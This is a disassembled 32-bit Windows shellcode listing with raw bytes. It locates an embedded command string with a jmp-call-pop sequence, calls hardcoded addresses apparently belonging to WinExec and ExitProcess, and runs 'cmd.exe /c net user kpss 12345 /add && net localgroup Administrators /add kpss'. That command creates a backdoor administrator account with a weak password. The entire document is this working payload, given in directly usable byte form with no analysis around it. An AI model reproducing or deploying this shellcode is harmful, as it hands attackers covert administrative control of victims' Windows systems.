0x0        jmp 0x1d                            \xeb\x1b                  ..        

     label_0x2:
0x2        pop ebx                             \x5b                      [         
0x3        xor eax, eax                        \x31\xc0                  1.        
0x5        push eax                            \x50                      P         
0x6        xor eax, eax                        \x31\xc0                  1.        
0x8        mov byte ptr [ebx + 0x4e], al       \x88\x43\x4e              .CN       
0xb        push ebx                            \x53                      S         
0xc        mov ebx, 0x7c86250d                 \xbb\x0d\x25\x86\x7c      ..%.|     
0x11       call ebx                            \xff\xd3                  ..        
0x13       xor eax, eax                        \x31\xc0                  1.        
0x15       push eax                            \x50                      P         
0x16       mov ebx, 0x7c81cb12                 \xbb\x12\xcb\x81\x7c      ....|     
0x1b       call ebx                            \xff\xd3                  ..        
     label_0x1d:
0x1d       call 2                              \xe8\xe0\xff\xff\xff      .....     
0x22       cmd.exe /c net user kpss 12345 /add && net localgroup Administrators /add kpss ; string\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x6b\x70\x73\x73\x20\x31\x32\x33\x34\x35\x20\x2f\x61\x64\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x61\x64\x64\x20\x6b\x70\x73\x73          
